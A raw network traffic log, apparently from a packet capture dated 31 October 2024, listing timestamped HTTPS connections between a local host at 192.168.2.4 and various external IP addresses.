Oct 31, 2024 19:19:34.438932896 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.445461035 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:34.447964907 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.447976112 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.448358059 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.448365927 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.449563026 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.449577093 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.449884892 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.449894905 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.450619936 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:34.450638056 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:34.450885057 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:34.451498985 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:34.451508045 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:34.451623917 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:34.451728106 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.451741934 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.454880953 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:34.454895020 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:34.454962015 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:34.469579935 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:34.469651937 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:34.469836950 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:34.477416039 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:34.477426052 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:34.478537083 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:34.478607893 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:34.480777979 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:34.480921030 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:34.480964899 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:34.487730980 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.487750053 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:34.491595030 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.491672039 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.493299961 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:34.493313074 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:34.493406057 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:34.493988037 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:34.494019032 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:34.494287014 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:34.494298935 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:34.494522095 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:34.494534969 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:34.498003006 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.498064995 CET	49845	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.509109020 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.509114981 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.509778976 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:34.509803057 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:34.510528088 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.510539055 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.510592937 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.528301954 CET	49845	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.528311968 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.530088902 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.530145884 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.531688929 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.531699896 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.533235073 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.533263922 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:34.533359051 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.540901899 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:34.540931940 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:34.541018963 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:34.541258097 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:34.541268110 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:34.544169903 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.544193029 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.544290066 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.545084953 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:34.545095921 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:34.545172930 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:34.545412064 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.545435905 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.557328939 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:34.557329893 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.557362080 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:34.557437897 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:34.559272051 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:34.559303999 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:34.560904026 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.560916901 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.561466932 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:34.561479092 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:34.565105915 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.565166950 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.565256119 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.575932980 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:34.575949907 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:34.577980042 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:34.578015089 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:34.578247070 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:34.579355955 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:34.579368114 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:34.579469919 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:34.584657907 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:34.584673882 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:34.585971117 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:34.585994959 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:34.586545944 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:34.586559057 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:34.587578058 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.587589025 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.604996920 CET	49914	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.605015039 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.605324030 CET	49914	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.605648041 CET	49914	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.605674982 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.610332012 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.610392094 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.610531092 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.611033916 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.611053944 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.661731005 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.661818027 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.007714033 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.007797956 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.007992983 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:35.061662912 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:35.061678886 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.119692087 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:35.119976044 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:35.119991064 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:35.120345116 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:35.120630026 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:35.120691061 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:35.120995045 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:35.164186001 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.167335033 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:35.178363085 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.178745031 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.178774118 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.179126024 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.179234982 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.179246902 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.179574966 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.179641962 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.179982901 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.182624102 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.182687998 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.188615084 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.188736916 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.189033031 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.189047098 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.227332115 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.246752024 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.246814013 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.246890068 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.280370951 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:35.282140017 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:35.282207966 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:35.282212019 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:35.282325983 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:35.284120083 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:35.289102077 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.291577101 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:35.291608095 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:35.291815042 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:35.291826010 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:35.292001009 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:35.292186022 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:35.321434975 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:35.326903105 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.336179972 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:35.336180925 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:35.354991913 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.372782946 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.406497002 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.412182093 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.414921045 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.436774969 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.440330029 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.442013979 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.442013979 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:35.442861080 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.450176954 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:35.450280905 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:35.450397015 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:35.450413942 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:35.451729059 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:35.457276106 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.457284927 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.457303047 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:35.457304955 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.480792999 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:35.480886936 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:35.480978966 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.480987072 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.481096029 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:35.481103897 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.482090950 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.482104063 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.482148886 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.482222080 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.482234955 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.482275009 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:35.484961987 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.484967947 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.486088991 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.486099958 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.486131907 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.510324001 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.510346889 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.510514975 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:35.510521889 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.510855913 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.510860920 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.511063099 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.511394978 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.511445045 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.512059927 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.512114048 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.514229059 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.514254093 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.515235901 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:35.515423059 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.515438080 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.515522957 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.515611887 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:35.525765896 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:35.525836945 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.528728008 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.528871059 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.539967060 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:35.540160894 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.543479919 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.543572903 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.546736956 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.546880007 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.548491955 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.548584938 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.555332899 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.556410074 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.559771061 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.561204910 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:35.561220884 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.564677954 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.564773083 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.569062948 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:35.571216106 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:35.571718931 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:35.571727991 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.572148085 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.572160006 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.572288990 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:35.572587013 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.572611094 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.572668076 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.572681904 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.572870016 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.572882891 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.573260069 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.573276043 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.593765974 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.593785048 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.595201015 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:35.595216990 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:35.597846031 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.597851992 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.598886967 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.598917007 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.598927021 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.598964930 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.601325989 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.602545977 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:35.602561951 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.603332996 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:35.604336977 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.604418993 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:35.607367039 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.607388020 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.607547045 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.608413935 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:35.608514071 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.609762907 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.609780073 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.611335039 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:35.612839937 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:35.612859011 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.615329027 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.615354061 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:35.619781017 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.620254993 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.620274067 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.621314049 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.621382952 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.626008987 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.626089096 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.626157999 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.626167059 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.642036915 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:35.642055035 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.642127991 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.657320976 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.657339096 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.657341003 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.723936081 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:35.724664927 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:35.724745989 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:35.730597019 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:35.730597019 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:35.730638027 CET	443	49900	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:35.730705023 CET	49900	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:35.735085011 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.735178947 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.735229015 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.736032009 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.736049891 CET	443	49888	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.736059904 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.736090899 CET	49888	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.738281012 CET	49923	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.738303900 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.738369942 CET	49923	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.738567114 CET	49923	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:35.738576889 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:35.740392923 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:35.740570068 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:35.740618944 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:35.747520924 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:35.747520924 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:35.747541904 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:35.747596025 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:35.811007977 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.811074972 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.811139107 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:35.812267065 CET	49890	443	192.168.2.4	178.250.1.9
Oct 31, 2024 19:19:35.812283993 CET	443	49890	178.250.1.9	192.168.2.4
Oct 31, 2024 19:19:35.817122936 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.817193985 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.817250967 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.819015980 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.819108009 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.819190025 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:35.819814920 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.821059942 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.822696924 CET	49898	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.822715044 CET	443	49898	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.823329926 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.823396921 CET	49889	443	192.168.2.4	52.16.92.15
